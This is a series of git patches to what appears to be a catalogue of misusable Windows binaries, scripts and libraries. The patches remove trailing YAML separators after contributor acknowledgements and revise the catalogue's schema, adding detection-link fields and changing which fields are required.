a/yml/OSBinaries/Vbc.yml +++ b/yml/OSBinaries/Vbc.yml @@ -31,4 +31,3 @@ Acknowledgement: Handle: - Person: Hai Vaknin(Lux) Handle: ---- diff --git a/yml/OSBinaries/Verclsid.yml b/yml/OSBinaries/Verclsid.yml index bf5280a..5b4f04c 100644 --- a/yml/OSBinaries/Verclsid.yml +++ b/yml/OSBinaries/Verclsid.yml @@ -25,4 +25,3 @@ Resources: Acknowledgement: - Person: Nick Tyrer Handle: '@NickTyrer' ---- diff --git a/yml/OSBinaries/Wab.yml b/yml/OSBinaries/Wab.yml index a3652cf..5a15a2a 100644 --- a/yml/OSBinaries/Wab.yml +++ b/yml/OSBinaries/Wab.yml @@ -25,4 +25,3 @@ Resources: Acknowledgement: - Person: Adam Handle: '@Hexacorn' ---- diff --git a/yml/OSBinaries/Wlrmdr.yml b/yml/OSBinaries/Wlrmdr.yml index 303a5fc..42365ae 100644 --- a/yml/OSBinaries/Wlrmdr.yml +++ b/yml/OSBinaries/Wlrmdr.yml @@ -30,4 +30,3 @@ Acknowledgement: Handle: '@Oddvarmoe' - Person: Freddy Handle: '@falsneg' ---- diff --git a/yml/OSBinaries/Wmic.yml b/yml/OSBinaries/Wmic.yml index f4271e9..b8737d2 100644 --- a/yml/OSBinaries/Wmic.yml +++ b/yml/OSBinaries/Wmic.yml @@ -88,4 +88,3 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- diff --git a/yml/OSBinaries/WorkFolders.yml b/yml/OSBinaries/WorkFolders.yml index 6d271a1..667c145 100644 --- a/yml/OSBinaries/WorkFolders.yml +++ b/yml/OSBinaries/WorkFolders.yml @@ -24,4 +24,3 @@ Acknowledgement: Handle: '@YoSignals' - Person: Elliot Killick Handle: '@elliotkillick' ---- diff --git a/yml/OSBinaries/Wscript.yml b/yml/OSBinaries/Wscript.yml index e24f33f..c7d8eb1 100644 --- a/yml/OSBinaries/Wscript.yml +++ b/yml/OSBinaries/Wscript.yml @@ -42,4 +42,3 @@ Acknowledgement: Handle: '@oddvarmoe' - Person: SaiLay(valen) Handle: '@404death' ---- diff --git a/yml/OSBinaries/Wsreset.yml b/yml/OSBinaries/Wsreset.yml index fcab2d3..f854c1c 100644 --- a/yml/OSBinaries/Wsreset.yml +++ b/yml/OSBinaries/Wsreset.yml @@ -31,4 +31,3 @@ Resources: Acknowledgement: - Person: Hashim Jawad Handle: '@ihack4falafel' ---- diff --git a/yml/OSBinaries/Wuauclt.yml b/yml/OSBinaries/Wuauclt.yml index c5608aa..d788e8d 100644 --- a/yml/OSBinaries/Wuauclt.yml +++ b/yml/OSBinaries/Wuauclt.yml @@ -26,4 +26,3 @@ Resources: Acknowledgement: - Person: David Middlehurst Handle: '@dtmsecurity' ---- diff --git a/yml/OSBinaries/Xwizard.yml b/yml/OSBinaries/Xwizard.yml index 8c01a73..61565c1 100644 --- a/yml/OSBinaries/Xwizard.yml +++ b/yml/OSBinaries/Xwizard.yml @@ -50,4 +50,3 @@ Acknowledgement: Handle: '@harr0ey' - Person: Wade Hickey Handle: '@notwhickey' ---- diff --git a/yml/OSLibraries/Advpack.yml b/yml/OSLibraries/Advpack.yml index 5e75f3c..eaae18d 100644 --- a/yml/OSLibraries/Advpack.yml +++ b/yml/OSLibraries/Advpack.yml @@ -62,4 +62,3 @@ Acknowledgement: Handle: '@moriarty_meng' - Person: Nick Carr (Threat Intel) Handle: '@ItsReallyNick' ---- diff --git a/yml/OSLibraries/Desk.yml b/yml/OSLibraries/Desk.yml index 532c0e7..b958500 100644 --- a/yml/OSLibraries/Desk.yml +++ b/yml/OSLibraries/Desk.yml @@ -41,4 +41,3 @@ Acknowledgement: Handle: '@SecurePeacock' - Person: Jose Luis Sanchez Handle: '@Joseliyo_Jstnk' ---- diff --git a/yml/OSLibraries/Dfshim.yml b/yml/OSLibraries/Dfshim.yml index 7deb471..b48fc42 100644 --- a/yml/OSLibraries/Dfshim.yml +++ b/yml/OSLibraries/Dfshim.yml @@ -26,4 +26,3 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- diff --git a/yml/OSLibraries/Ieadvpack.yml b/yml/OSLibraries/Ieadvpack.yml index 5d4b41d..2a08d33 100644 --- a/yml/OSLibraries/Ieadvpack.yml +++ b/yml/OSLibraries/Ieadvpack.yml @@ -57,4 +57,3 @@ Acknowledgement: Handle: '@0rbz_' - Person: Pierre-Alexandre Braeken (RegisterOCX - CMD) Handle: '@pabraeken' ---- diff --git a/yml/OSLibraries/Ieframe.yml b/yml/OSLibraries/Ieframe.yml index 7d8bc1b..348928d 100644 --- a/yml/OSLibraries/Ieframe.yml +++ b/yml/OSLibraries/Ieframe.yml @@ -28,4 +28,3 @@ Acknowledgement: Handle: '@bohops' - Person: Adam Handle: '@hexacorn' ---- diff --git a/yml/OSLibraries/Mshtml.yml b/yml/OSLibraries/Mshtml.yml index 9483c3c..73f3388 100644 --- a/yml/OSLibraries/Mshtml.yml +++ b/yml/OSLibraries/Mshtml.yml @@ -24,4 +24,3 @@ Resources: Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ---- diff --git a/yml/OSLibraries/Pcwutl.yml b/yml/OSLibraries/Pcwutl.yml index 1f47e38..0a3def5 100644 --- a/yml/OSLibraries/Pcwutl.yml +++ b/yml/OSLibraries/Pcwutl.yml @@ -25,4 +25,3 @@ Resources: Acknowledgement: - Person: Matt harr0ey Handle: '@harr0ey' ---- diff --git a/yml/OSLibraries/Setupapi.yml b/yml/OSLibraries/Setupapi.yml index 4295dd3..adf27be 100644 --- a/yml/OSLibraries/Setupapi.yml +++ b/yml/OSLibraries/Setupapi.yml @@ -43,4 +43,3 @@ Acknowledgement: Handle: '@subTee' - Person: Nick Carr (Threat Intel) Handle: '@ItsReallyNick' ---- diff --git a/yml/OSLibraries/Shdocvw.yml b/yml/OSLibraries/Shdocvw.yml index 8a8dccd..c3f5bd8 100644 --- a/yml/OSLibraries/Shdocvw.yml +++ b/yml/OSLibraries/Shdocvw.yml @@ -28,4 +28,3 @@ Acknowledgement: Handle: '@hexacorn' - Person: Jimmy Handle: '@bohops' ---- diff --git a/yml/OSLibraries/Shell32.yml b/yml/OSLibraries/Shell32.yml index 4ddf18e..ea8e116 100644 --- a/yml/OSLibraries/Shell32.yml +++ b/yml/OSLibraries/Shell32.yml @@ -46,4 +46,3 @@ Acknowledgement: Handle: '@mattifestation' - Person: Kyle Hanslovan (ShellExec_RunDLL) Handle: '@KyleHanslovan' ---- diff --git a/yml/OSLibraries/Syssetup.yml b/yml/OSLibraries/Syssetup.yml index 44a0bb4..ad673b2 100644 --- a/yml/OSLibraries/Syssetup.yml +++ b/yml/OSLibraries/Syssetup.yml @@ -40,4 +40,3 @@ Acknowledgement: Handle: '@harr0ey' - Person: Jimmy (Scriptlet) Handle: '@bohops' ---- diff --git a/yml/OSLibraries/Url.yml b/yml/OSLibraries/Url.yml index ea34df9..0de5892 100644 --- a/yml/OSLibraries/Url.yml +++ b/yml/OSLibraries/Url.yml @@ -69,4 +69,3 @@ Acknowledgement: Handle: '@DissectMalware' - Person: r0lan (Obfuscation) Handle: '@r0lan' ---- diff --git a/yml/OSLibraries/Zipfldr.yml b/yml/OSLibraries/Zipfldr.yml index d64c755..129fad6 100644 --- a/yml/OSLibraries/Zipfldr.yml +++ b/yml/OSLibraries/Zipfldr.yml @@ -34,4 +34,3 @@ Acknowledgement: Handle: '@moriarty_meng' - Person: r0lan (Obfuscation) Handle: '@r0lan' ---- diff --git a/yml/OSLibraries/comsvcs.yml b/yml/OSLibraries/comsvcs.yml index 03596cf..500214b 100644 --- a/yml/OSLibraries/comsvcs.yml +++ b/yml/OSLibraries/comsvcs.yml @@ -26,4 +26,3 @@ Resources: Acknowledgement: - Person: modexp Handle: ---- diff --git a/yml/OSScripts/CL_LoadAssembly.yml b/yml/OSScripts/CL_LoadAssembly.yml index 638cea1..a227eaf 100644 --- a/yml/OSScripts/CL_LoadAssembly.yml +++ b/yml/OSScripts/CL_LoadAssembly.yml @@ -22,4 +22,3 @@ Resources: Acknowledgement: - Person: Jimmy Handle: '@bohops' ---- diff --git a/yml/OSScripts/CL_mutexverifiers.yml b/yml/OSScripts/CL_mutexverifiers.yml index 08d6674..22ee4fa 100644 --- a/yml/OSScripts/CL_mutexverifiers.yml +++ b/yml/OSScripts/CL_mutexverifiers.yml @@ -26,4 +26,3 @@ Resources: Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ---- diff --git a/yml/OSScripts/Cl_invocation.yml b/yml/OSScripts/Cl_invocation.yml index 6610eb1..8197863 100644 --- a/yml/OSScripts/Cl_invocation.yml +++ b/yml/OSScripts/Cl_invocation.yml @@ -28,4 +28,3 @@ Acknowledgement: Handle: '@bohops' - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ---- diff --git a/yml/OSScripts/Manage-bde.yml b/yml/OSScripts/Manage-bde.yml index edf125c..bab7431 100644 --- a/yml/OSScripts/Manage-bde.yml +++ b/yml/OSScripts/Manage-bde.yml @@ -36,4 +36,3 @@ Acknowledgement: Handle: '@danielbohannon' - Person: John Lambert Handle: '@JohnLaTwC' ---- diff --git a/yml/OSScripts/Pubprn.yml b/yml/OSScripts/Pubprn.yml index b95813a..b86d241 100644 --- a/yml/OSScripts/Pubprn.yml +++ b/yml/OSScripts/Pubprn.yml @@ -25,4 +25,3 @@ Resources: Acknowledgement: - Person: Matt Nelson Handle: '@enigma0x3' ---- diff --git a/yml/OSScripts/Syncappvpublishingserver.yml b/yml/OSScripts/Syncappvpublishingserver.yml index fb6aa06..f9e3dd4 100644 --- a/yml/OSScripts/Syncappvpublishingserver.yml +++ b/yml/OSScripts/Syncappvpublishingserver.yml @@ -25,4 +25,3 @@ Acknowledgement: Handle: '@monoxgas' - Person: Casey Smith Handle: '@subtee' ---- diff --git a/yml/OSScripts/UtilityFunctions.yml b/yml/OSScripts/UtilityFunctions.yml index b4908a6..ee53be2 100644 --- a/yml/OSScripts/UtilityFunctions.yml +++ b/yml/OSScripts/UtilityFunctions.yml @@ -22,4 +22,3 @@ Resources: Acknowledgement: - Person: Nick VanGilder Handle: '@nickvangilder' ---- diff --git a/yml/OSScripts/Winrm.yml b/yml/OSScripts/Winrm.yml index 67a1719..cdd4176 100644 --- a/yml/OSScripts/Winrm.yml +++ b/yml/OSScripts/Winrm.yml @@ -55,4 +55,3 @@ Acknowledgement: Handle: '@bohops' - Person: Red Canary Company cc Tony Lambert Handle: '@redcanaryco' ---- diff --git a/yml/OSScripts/pester.yml b/yml/OSScripts/pester.yml index bc19377..c7d8827 100644 --- a/yml/OSScripts/pester.yml +++ b/yml/OSScripts/pester.yml @@ -34,4 +34,3 @@ Acknowledgement: Handle: '@p0w3rsh3ll' - Person: Stamatis Chatzimangou Handle: '@_st0pp3r_' ---- diff --git a/yml/OtherMSBinaries/AccCheckConsole.yml b/yml/OtherMSBinaries/AccCheckConsole.yml index 6c21705..8c07903 100644 --- a/yml/OtherMSBinaries/AccCheckConsole.yml +++ b/yml/OtherMSBinaries/AccCheckConsole.yml @@ -34,4 +34,3 @@ Resources: Acknowledgement: - Person: Jimmy Handle: '@bohops' ---- diff --git a/yml/OtherMSBinaries/Adplus.yml b/yml/OtherMSBinaries/Adplus.yml index da7749d..0cd6d62 100644 --- a/yml/OtherMSBinaries/Adplus.yml +++ b/yml/OtherMSBinaries/Adplus.yml @@ -23,4 +23,3 @@ Resources: Acknowledgement: - Person: mr.d0x Handle: '@mrd0x' ---- diff --git a/yml/OtherMSBinaries/Agentexecutor.yml b/yml/OtherMSBinaries/Agentexecutor.yml index e082f2c..1af9f88 100644 --- a/yml/OtherMSBinaries/Agentexecutor.yml +++ b/yml/OtherMSBinaries/Agentexecutor.yml @@ -28,4 +28,3 @@ Resources: Acknowledgement: - Person: Eleftherios Panos Handle: '@lefterispan' ---- diff --git a/yml/OtherMSBinaries/Appvlp.yml b/yml/OtherMSBinaries/Appvlp.yml index d8fdf6b..ad91b5f 100644 --- a/yml/OtherMSBinaries/Appvlp.yml +++ b/yml/OtherMSBinaries/Appvlp.yml @@ -44,4 +44,3 @@ Acknowledgement: Handle: '@moo_hax' - Person: Matt Wilson Handle: '@enigma0x3' ---- diff --git a/yml/OtherMSBinaries/Bginfo.yml b/yml/OtherMSBinaries/Bginfo.yml index 78d64cf..0d94ccf 100644 --- a/yml/OtherMSBinaries/Bginfo.yml +++ b/yml/OtherMSBinaries/Bginfo.yml @@ -60,4 +60,3 @@ Resources: Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- diff --git a/yml/OtherMSBinaries/Cdb.yml b/yml/OtherMSBinaries/Cdb.yml index 8e82023..db3adea 100644 --- a/yml/OtherMSBinaries/Cdb.yml +++ b/yml/OtherMSBinaries/Cdb.yml @@ -42,4 +42,3 @@ Acknowledgement: Handle: '@mrd0x' - Person: Spooky Sec Handle: '@sec_spooky' ---- diff --git a/yml/OtherMSBinaries/Coregen.yml b/yml/OtherMSBinaries/Coregen.yml index 7026e44..d92d2dc 100644 --- a/yml/OtherMSBinaries/Coregen.yml +++ b/yml/OtherMSBinaries/Coregen.yml @@ -46,4 +46,3 @@ Acknowledgement: Handle: - Person: Casey Erikson Handle: ---- diff --git a/yml/OtherMSBinaries/Csi.yml b/yml/OtherMSBinaries/Csi.yml index 7634065..abd9565 100644 --- a/yml/OtherMSBinaries/Csi.yml +++ b/yml/OtherMSBinaries/Csi.yml @@ -28,4 +28,3 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- diff --git a/yml/OtherMSBinaries/DefaultPack.yml b/yml/OtherMSBinaries/DefaultPack.yml index a1c22cc..dc4eab5 100644 --- a/yml/OtherMSBinaries/DefaultPack.yml +++ b/yml/OtherMSBinaries/DefaultPack.yml @@ -22,4 +22,3 @@ Resources: Acknowledgement: - Person: checkymander Handle: '@checkymander' ---- diff --git a/yml/OtherMSBinaries/Devtoolslauncher.yml b/yml/OtherMSBinaries/Devtoolslauncher.yml index dede1aa..00b82ac 100644 --- a/yml/OtherMSBinaries/Devtoolslauncher.yml +++ b/yml/OtherMSBinaries/Devtoolslauncher.yml @@ -30,4 +30,3 @@ Resources: Acknowledgement: - Person: felamos Handle: '@_felamos' ---- diff --git a/yml/OtherMSBinaries/Dnx.yml b/yml/OtherMSBinaries/Dnx.yml index ba2d22a..7957ca2 100644 --- a/yml/OtherMSBinaries/Dnx.yml +++ b/yml/OtherMSBinaries/Dnx.yml @@ -25,4 +25,3 @@ Resources: Acknowledgement: - Person: Matt Nelson Handle: '@enigma0x3' ---- diff --git a/yml/OtherMSBinaries/Dotnet.yml b/yml/OtherMSBinaries/Dotnet.yml index 2490174..107fd5e 100644 --- a/yml/OtherMSBinaries/Dotnet.yml +++ b/yml/OtherMSBinaries/Dotnet.yml @@ -38,4 +38,3 @@ Acknowledgement: Handle: '@_felamos' - Person: Jimmy Handle: '@bohops' ---- diff --git a/yml/OtherMSBinaries/Dump64.yml b/yml/OtherMSBinaries/Dump64.yml index 4adb7c9..e4d1c6d 100644 --- a/yml/OtherMSBinaries/Dump64.yml +++ b/yml/OtherMSBinaries/Dump64.yml @@ -21,4 +21,3 @@ Resources: Acknowledgement: - Person: mr.d0x Handle: '@mrd0x' ---- diff --git a/yml/OtherMSBinaries/Dxcap.yml b/yml/OtherMSBinaries/Dxcap.yml index 6cc8b9d..cf5b56f 100644 --- a/yml/OtherMSBinaries/Dxcap.yml +++ b/yml/OtherMSBinaries/Dxcap.yml @@ -23,4 +23,3 @@ Resources: Acknowledgement: - Person: Matt harr0ey Handle: '@harr0ey' ---- diff --git a/yml/OtherMSBinaries/Excel.yml b/yml/OtherMSBinaries/Excel.yml index a12816b..0dc1354 100644 --- a/yml/OtherMSBinaries/Excel.yml +++ b/yml/OtherMSBinaries/Excel.yml @@ -38,4 +38,3 @@ Resources: Acknowledgement: - Person: 'Reegun J (OCBC Bank)' Handle: '@reegun21' ---- diff --git a/yml/OtherMSBinaries/Fsi.yml b/yml/OtherMSBinaries/Fsi.yml index 2adf80a..f427c5a 100644 --- a/yml/OtherMSBinaries/Fsi.yml +++ b/yml/OtherMSBinaries/Fsi.yml @@ -36,4 +36,3 @@ Acknowledgement: Handle: '@NickTyrer' - Person: Jimmy Handle: '@bohops' ---- diff --git a/yml/OtherMSBinaries/FsiAnyCpu.yml b/yml/OtherMSBinaries/FsiAnyCpu.yml index 54e1cf5..35cc6c3 100644 --- a/yml/OtherMSBinaries/FsiAnyCpu.yml +++ b/yml/OtherMSBinaries/FsiAnyCpu.yml @@ -32,4 +32,3 @@ Acknowledgement: Handle: '@NickTyrer' - Person: Jimmy Handle: '@bohops' ---- diff --git a/yml/OtherMSBinaries/Mftrace.yml b/yml/OtherMSBinaries/Mftrace.yml index 6a98a92..93c0440 100644 --- a/yml/OtherMSBinaries/Mftrace.yml +++ b/yml/OtherMSBinaries/Mftrace.yml @@ -31,4 +31,3 @@ Resources: Acknowledgement: - Person: fabrizio Handle: '@0rbz_' ---- diff --git a/yml/OtherMSBinaries/Msdeploy.yml b/yml/OtherMSBinaries/Msdeploy.yml index 234878a..3d285b3 100644 --- a/yml/OtherMSBinaries/Msdeploy.yml +++ b/yml/OtherMSBinaries/Msdeploy.yml @@ -30,4 +30,3 @@ Resources: Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ---- diff --git a/yml/OtherMSBinaries/Msxsl.yml b/yml/OtherMSBinaries/Msxsl.yml index 1fae912..77a3a18 100644 --- a/yml/OtherMSBinaries/Msxsl.yml +++ b/yml/OtherMSBinaries/Msxsl.yml @@ -47,4 +47,3 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- diff --git a/yml/OtherMSBinaries/Ntdsutil.yml b/yml/OtherMSBinaries/Ntdsutil.yml index dc6bfe4..d9db99f 100644 --- a/yml/OtherMSBinaries/Ntdsutil.yml +++ b/yml/OtherMSBinaries/Ntdsutil.yml @@ -25,4 +25,3 @@ Resources: Acknowledgement: - Person: Sean Metcalf Handle: '@PyroTek3' ---- diff --git a/yml/OtherMSBinaries/Powerpnt.yml b/yml/OtherMSBinaries/Powerpnt.yml index 2e72a56..28baf81 100644 --- a/yml/OtherMSBinaries/Powerpnt.yml +++ b/yml/OtherMSBinaries/Powerpnt.yml @@ -35,4 +35,3 @@ Resources: Acknowledgement: - Person: Reegun J (OCBC Bank) Handle: '@reegun21' ---- diff --git a/yml/OtherMSBinaries/Procdump.yml b/yml/OtherMSBinaries/Procdump.yml index 65cbb04..546371f 100644 --- a/yml/OtherMSBinaries/Procdump.yml +++ b/yml/OtherMSBinaries/Procdump.yml @@ -31,4 +31,3 @@ Resources: Acknowledgement: - Name: Alfie Champion Handle: '@ajpc500' ---- diff --git a/yml/OtherMSBinaries/Rcsi.yml b/yml/OtherMSBinaries/Rcsi.yml index 37af40f..e15b4c9 100644 --- a/yml/OtherMSBinaries/Rcsi.yml +++ b/yml/OtherMSBinaries/Rcsi.yml @@ -32,4 +32,3 @@ Resources: Acknowledgement: - Person: Matt Nelson Handle: '@enigma0x3' ---- diff --git a/yml/OtherMSBinaries/Remote.yml b/yml/OtherMSBinaries/Remote.yml index 73931d7..2879a6e 100644 --- a/yml/OtherMSBinaries/Remote.yml +++ b/yml/OtherMSBinaries/Remote.yml @@ -37,4 +37,3 @@ Resources: Acknowledgement: - Person: mr.d0x Handle: '@mrd0x' ---- diff --git a/yml/OtherMSBinaries/Sqldumper.yml b/yml/OtherMSBinaries/Sqldumper.yml index f851b49..accc4b1 100644 --- a/yml/OtherMSBinaries/Sqldumper.yml +++ b/yml/OtherMSBinaries/Sqldumper.yml @@ -34,4 +34,3 @@ Resources: Acknowledgement: - Person: Luis Rocha Handle: '@countuponsec' ---- diff --git a/yml/OtherMSBinaries/Sqlps.yml b/yml/OtherMSBinaries/Sqlps.yml index 235cbf4..64f3c43 100644 --- a/yml/OtherMSBinaries/Sqlps.yml +++ b/yml/OtherMSBinaries/Sqlps.yml @@ -33,4 +33,3 @@ Acknowledgement: Handle: '@bryon_' - Person: Manny Handle: '@ManuelBerrueta' ---- diff --git a/yml/OtherMSBinaries/Sqltoolsps.yml b/yml/OtherMSBinaries/Sqltoolsps.yml index 492d0d4..58c2f90 100644 --- a/yml/OtherMSBinaries/Sqltoolsps.yml +++ b/yml/OtherMSBinaries/Sqltoolsps.yml @@ -24,4 +24,3 @@ Resources: Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ---- diff --git a/yml/OtherMSBinaries/Squirrel.yml b/yml/OtherMSBinaries/Squirrel.yml index a663d7c..0520437 100644 --- a/yml/OtherMSBinaries/Squirrel.yml +++ b/yml/OtherMSBinaries/Squirrel.yml @@ -55,4 +55,3 @@ Acknowledgement: Handle: '@reegun21' - Person: Adam Handle: '@Hexacorn' ---- diff --git a/yml/OtherMSBinaries/Te.yml b/yml/OtherMSBinaries/Te.yml index 6059749..ee6f3ce 100644 --- a/yml/OtherMSBinaries/Te.yml +++ b/yml/OtherMSBinaries/Te.yml @@ -22,4 +22,3 @@ Resources: Acknowledgement: - Person: Giuseppe N3mes1s Handle: '@gN3mes1s' ---- diff --git a/yml/OtherMSBinaries/Tracker.yml b/yml/OtherMSBinaries/Tracker.yml index 6657aeb..e1de666 100644 --- a/yml/OtherMSBinaries/Tracker.yml +++ b/yml/OtherMSBinaries/Tracker.yml @@ -30,4 +30,3 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subTee' ---- diff --git a/yml/OtherMSBinaries/Update.yml b/yml/OtherMSBinaries/Update.yml index 7143975..84822c3 100644 --- a/yml/OtherMSBinaries/Update.yml +++ b/yml/OtherMSBinaries/Update.yml @@ -119,4 +119,3 @@ Acknowledgement: - Person: Adam Handle: '@Hexacorn' - Person: Jesus Galvez ---- diff --git a/yml/OtherMSBinaries/VSIISExeLauncher.yml b/yml/OtherMSBinaries/VSIISExeLauncher.yml index 3b5d330..95eb07f 100644 --- a/yml/OtherMSBinaries/VSIISExeLauncher.yml +++ b/yml/OtherMSBinaries/VSIISExeLauncher.yml @@ -22,4 +22,3 @@ Resources: Acknowledgement: - Person: timwhite Handle: ---- diff --git a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml index a32369a..4afb3a5 100644 --- a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml +++ b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml @@ -28,4 +28,3 @@ Acknowledgement: Handle: '@tifkin' - Person: Jimmy Handle: '@bohops' ---- diff --git a/yml/OtherMSBinaries/Vsjitdebugger.yml b/yml/OtherMSBinaries/Vsjitdebugger.yml index a1eb7c8..29cbb5e 100644 --- a/yml/OtherMSBinaries/Vsjitdebugger.yml +++ b/yml/OtherMSBinaries/Vsjitdebugger.yml @@ -22,4 +22,3 @@ Resources: Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ---- diff --git a/yml/OtherMSBinaries/Wfc.yml b/yml/OtherMSBinaries/Wfc.yml index 13e6a11..2d084c7 100644 --- a/yml/OtherMSBinaries/Wfc.yml +++ b/yml/OtherMSBinaries/Wfc.yml @@ -25,4 +25,3 @@ Acknowledgement: Handle: '@mattifestation' - Person: Jimmy Handle: '@bohops' ---- diff --git a/yml/OtherMSBinaries/Winword.yml b/yml/OtherMSBinaries/Winword.yml index 2453029..11bc887 100644 --- a/yml/OtherMSBinaries/Winword.yml +++ b/yml/OtherMSBinaries/Winword.yml @@ -38,4 +38,3 @@ Resources: Acknowledgement: - Person: 'Reegun J (OCBC Bank)' Handle: '@reegun21' ---- diff --git a/yml/OtherMSBinaries/Wsl.yml b/yml/OtherMSBinaries/Wsl.yml index 6884dfc..ab97c09 100644 --- a/yml/OtherMSBinaries/Wsl.yml +++ b/yml/OtherMSBinaries/Wsl.yml @@ -49,4 +49,3 @@ Acknowledgement: Handle: '@NotoriousRebel1' - Person: Asif Matadar Handle: '@d1r4c' ---- From ee011e6281cae3bd23ec7bd4447a99b19b124813 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 22:21:56 -0400 Subject: [PATCH 21/60] Correcting schema --- YML-Schema.yml | 36 ++++++++++++++++++------------------ 1 file changed, 18 insertions(+), 18 deletions(-) diff --git a/YML-Schema.yml b/YML-Schema.yml index 0fb7481..f129849 100644 --- a/YML-Schema.yml +++ b/YML-Schema.yml @@ -4,20 +4,20 @@ mapping: # Id field enhancement possibility commenting out for now # "Id": # type: str -# required: yes +# required: true # pattern: '[a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}' "Name": type: str - required: yes + required: true "Description": type: str - required: yes + required: true "Author": type: str - required: yes + required: true "Created": type: str - required: yes + required: true "Commands": type: seq sequence: @@ -25,39 +25,39 @@ mapping: mapping: "Command": type: str - required: yes + required: true "Description": type: str - required: yes + required: true "Usecase": type: str - required: yes + required: true "Category": type: str - required: yes + required: true enum: [ADS, AWL Bypass, Compile, Copy, Credentials, Decode, Download, Dump, Encode, Execute, Reconnaissance, UAC Bypass, Upload] "Privileges": type: str - required: yes + required: true "MitreID": type: str - required: yes + required: true pattern: 'T[0-9]{4}' "OperatingSystem": type: str - required: yes + required: true "Full_Path": type: seq - required: yes + required: true sequence: - type: map mapping: "Path": type: str - required: yes + required: true "Code_Sample": type: seq - required: yes + required: true sequence: - type: map mapping: @@ -65,7 +65,7 @@ mapping: type: str "Detection": type: seq - required: yes + required: true sequence: - type: map mapping: @@ -73,7 +73,7 @@ mapping: type: str "Resources": type: seq - required: yes + required: true sequence: - type: map mapping: @@ -82,7 +82,7 @@ mapping: pattern: 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+' "Acknowledgement": type: seq - required: yes + required: true sequence: - type: map mapping: From 22481bcb71a861eb8ff3711f7d3ba0ec33f55185 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 22:32:51 -0400 Subject: [PATCH 22/60] Updating schema file. --- YML-Schema.yml | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/YML-Schema.yml b/YML-Schema.yml index f129849..9d5b6c1 100644 --- a/YML-Schema.yml +++ b/YML-Schema.yml @@ -71,6 +71,21 @@ mapping: mapping: "IOC": type: str + "Sigma": + type: str + pattern: 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+' + "Analysis": + type: str + pattern: 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+' + "Elastic": + type: str + pattern: 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+' + "Splunk": + type: str + pattern: 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+' + "BlockRule": + type: str + pattern: 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+' "Resources": type: seq required: true From 48ec17df1ccea837e2b37c6966e3dba83155698b Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 22:36:43 -0400 Subject: [PATCH 23/60] Updating schema file. --- YML-Schema.yml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/YML-Schema.yml b/YML-Schema.yml index 9d5b6c1..f0d7314 100644 --- a/YML-Schema.yml +++ b/YML-Schema.yml @@ -20,6 +20,7 @@ mapping: required: true "Commands": type: seq + required: true sequence: - type: map mapping: @@ -57,7 +58,7 @@ mapping: required: true "Code_Sample": type: seq - required: true + required: false sequence: - type: map mapping: @@ -65,7 +66,7 @@ mapping: type: str "Detection": type: seq - required: true + required: false sequence: - type: map mapping: @@ -88,7 +89,7 @@ mapping: pattern: 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+' "Resources": type: seq - required: true + required: false sequence: - type: map mapping: @@ -97,7 +98,7 @@ mapping: pattern: 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+' "Acknowledgement": type: seq - required: true + required: false sequence: - type: map mapping: From 389b7e5bdd523207ac7ae4350f1cb55cdc3b40c2 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 22:43:02 -0400 Subject: [PATCH 24/60] Updating schema, created as date. --- YML-Schema.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/YML-Schema.yml b/YML-Schema.yml index f0d7314..6c939cd 100644 --- a/YML-Schema.yml +++ b/YML-Schema.yml @@ -16,7 +16,7 @@ mapping: type: str required: true "Created": - type: str + type: date required: true "Commands": type: seq From 5e0ae9c976c4b290fa79b69e95e0646ea45e2029 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 22:46:13 -0400 Subject: [PATCH 25/60] Correcting Cmstp.yml Category value. --- yml/OSBinaries/Cmstp.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/Cmstp.yml b/yml/OSBinaries/Cmstp.yml index 247a27c..f4dc7d4 100644 --- a/yml/OSBinaries/Cmstp.yml +++ b/yml/OSBinaries/Cmstp.yml 